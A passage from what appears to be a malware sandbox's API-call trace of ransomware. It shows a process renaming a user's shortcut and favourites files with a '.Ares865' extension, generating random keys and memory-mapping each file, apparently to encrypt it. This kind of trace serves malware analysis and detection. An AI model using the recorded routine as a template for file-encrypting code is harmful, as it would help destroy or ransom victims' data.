HALPmcxz\\Links\\Downloads.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=929) returned 1 [0106.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.725] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.726] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x124 [0106.731] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x190000 [0106.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Ares865") returned 60 [0106.734] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.ares865"), dwFlags=0x1) returned 1 [0106.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=363) returned 1 [0106.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.738] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.739] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.739] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.739] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x124 [0106.742] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0106.744] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0106.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.Ares865") returned 59 [0106.747] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0106.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0106.748] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.749] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.749] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.749] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.749] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x124 [0106.751] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x190000 [0106.751] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.752] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.752] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.752] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.753] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0106.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.Ares865") returned 81 [0106.755] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.ares865"), dwFlags=0x1) returned 1 [0106.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.758] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.758] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.759] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.759] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.759] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.762] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.763] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.764] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.764] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0106.765] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865") returned 85 [0106.765] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.ares865"), dwFlags=0x1) returned 1 [0106.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.769] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.770] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.773] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0106.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865") returned 82 [0106.776] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.ares865"), dwFlags=0x1) returned 1 [0106.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.778] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.778] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.778] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.779] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.782] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.783] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0106.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865") returned 84 [0106.784] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.ares865"), dwFlags=0x1) returned 1 [0106.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.789] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.793] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.797] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.797] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.797] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0106.798] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0106.798] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.Ares865") returned 74 [0106.798] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.ares865"), dwFlags=0x1) returned 1 [0106.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.802] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.803] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.807] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.808] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.809] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.809] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.810] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865") returned 82 [0106.810] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.ares865"), dwFlags=0x1) returned 1 [0106.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.814] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.815] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.817] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.821] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.824] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.824] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.Ares865") returned 74 [0106.824] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.ares865"), dwFlags=0x1) returned 1 [0106.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.827] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.828] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.828] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.832] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.834] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 